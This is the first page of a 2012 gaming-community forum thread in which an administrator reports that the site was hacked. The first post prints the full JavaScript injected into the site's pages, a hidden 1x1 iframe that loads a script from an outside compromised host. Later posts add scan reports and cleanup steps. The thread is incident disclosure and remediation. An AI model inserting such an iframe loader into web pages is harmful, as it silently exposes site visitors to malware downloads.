Page 1 of 8 123 ... LastLast
Results 1 to 10 of 80

Thread: Forum Down Time

  1. #1
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Exclamation Forum Down Time

    Just to give a little bit of a status update with regards to the malware issue.
    I initially thought that the malware problem was a false positive, but it turned out, that it indeed was a REAL problem. Somehow (still trying to find the culprit) the website had javascript code embedded on all the html pages and several php pages.
    I ended up having to do a clean install of the board, and I disabled the mods for the time being.
    I have found out that the pages have been injected on 12\10\12, I'm still trying to figure out how, but basically this is the syntax that was embedded
    Code:
    <!--f524d6--><script type="text/javascript" language="javascript" > (function () { var vjh = document.createElement('iframe'); vjh.src = 'http://varmeteknik.se/wp-admin/count.php'; vjh.style.position = 'absolute'; vjh.style.border = '0'; vjh.style.height = '1px'; vjh.style.width = '1px'; vjh.style.left = '1px'; vjh.style.top = '1px'; if (!document.getElementById('vjh')) { document.write('<div id=\'vjh\'></div>'); document.getElementById('vjh').appendChild(vjh); }})();</script><!--/f524d6-->
    This could also be the reason why the home page jquery stuff is off, because I found it was embedded in there along with other pages. The cleaning process could be a tedious one, but I'm doing my best to get this all sorted out. I have a backup of everything just in case.
    Thanks for your patience everyone, and if anyone has any more info about this attack or anything that can help secure against it, please let me know.

  2. #2

    Default

    Hi James any idea what the script does ?

  3. #3

    Default

    Knowing how this happened may prove to be difficult. It would be nice to know if the attack came from the forums or the site... though, the site doesn't have any input, so how would it suffer an injection attack. Anyways, if there's anything I can do to help clean this up, let me know. I have experience doing this type of thing.
    Browse MOHAA Servers Post GameSpy Era

    VISIT MOHREBORN.COM FOR LATEST INFORMATION



    Medal of Honor: Game Server Browser Fixer - Patches your MOHAA, MOHSH, and MOHBT game binaries to allow you to retrieve a list of game servers within the multi-player menu in-game even after GameSpy ceases operation!

    Medal of Honor: Query Launcher - Find, browse, organize, join, get your ping, and get more information regarding all Medal of Honor (AA, SH, & BT) servers from your PC at any time!
    Medal of Honor: Web Server Master List - Find and browse all Medal of Honor servers online using your browser!
    Add your Medal of Honor Server to the Master List
    YouTube Video for Medal of Honor: Query Launcher and MOHAASERVERS.TK!



    MOHAA Mods and Utilities
    OwN-3m-All's Mods
    Make Me Stock - A program that allows you to easily move-in and move-out non-stock mods and other files at the click of a button. Automates adding / removing mods without having to copy / move files manually.



    Quality Game Servers

    Rent dedicated Dallas Texas, Kansas City, Las Vegas Nevada, Chicago, Pennsylvania, and Sofia Bulgaria MOHAA and other game servers from We Be HostiN starting at $10 a month.


  4. #4
    Über Prodigy & Developer Razo[R]apiD's Avatar
    Join Date
    May 2010
    Location
    Poland, Lublin
    Posts
    3,257

    Default

    I think it could be done via IRC or Shoutbox, thats why I told James to turn them off for now.

  5. #5
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Default

    I'm not sure how it happened. I think I cleaned it out, but it may take some time for the changes to propagate. I'm hoping that's the case and the site doesn't continue getting flagged. @own3mall, honesty, when I say inject, I meant literally they embedded that code I posted above into the php and html website. That included our home page x-null.net\moh as well as the forums. I'm also hosting other sites on this domain (my cousins business) which is in no way affiliated with xnull, since they have their own domain, and their site also got injected with the code.I had to manually go into each php and html file, search for a part of the code above and delete any references to it.That's about the only information I have at this point. As far as the forums are concerned, I have backups made and I did a clean install and it's still getting flagged which is why I'm hoping it just needs to propagate the changes. I will keep everyone posted on the status. I'm so sorry for the inconvenience!

  6. #6
    Client Beta Testers Appelpitje's Avatar
    Join Date
    Jan 2012
    Location
    Belgium
    Posts
    571

    Default

    Not sure if you know all the infected places on the site but sucuri sitecheck gave this:

    Code:
    Security warning in the URL: 
    http://www.x-null.net/MOH/404testpage4525d2fdc
    
    Security warning in the URL: 
    http://www.x-null.net/MOH/404javascript.js
    
    Malware found in the URL: 
    http://www.x-null.net/wiki/

  7. #7

    Default

    Going by Chrome info -:
    Safe Browsing
    Diagnostic page for x-null.net

    What is the current listing status for x-null.net?
    Site is listed as suspicious - visiting this website may harm your computer.

    Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

    What happened when Google visited this site?
    Of the 9 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-12-14, and the last time suspicious content was found on this site was on 2012-12-14.
    Malicious software includes 10 exploit(s).

    This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

    Has this site acted as an intermediary resulting in further distribution of malware?
    Over the past 90 days, x-null.net did not appear to function as an intermediary for the infection of any sites.

    Has this site hosted malware?
    No, this site has not hosted malicious software over the past 90 days.

    How did this happen?
    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

    Next steps:
    Return to the previous page.
    If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.


    That's dating back to the 14th so not sure on the expire times for sites that were flagged and then now clean - but you should be able to force a review James on Google webmaster as above to clear the flag
    Last edited by heatsinkbod; December 16th, 2012 at 02:34 PM.

  8. #8

    Default

    im geting a warning from the Firefox aswel

  9. #9

  10. #10
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Default

    Thank you everyone, I have cleaned up all traces that I have found. I resubmitted a request for google to recheck my site. On a side note, for those of you that added the site on a trusted site due to your virus scanner, if you removed it again, can you tell me if you still get warned on your end?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •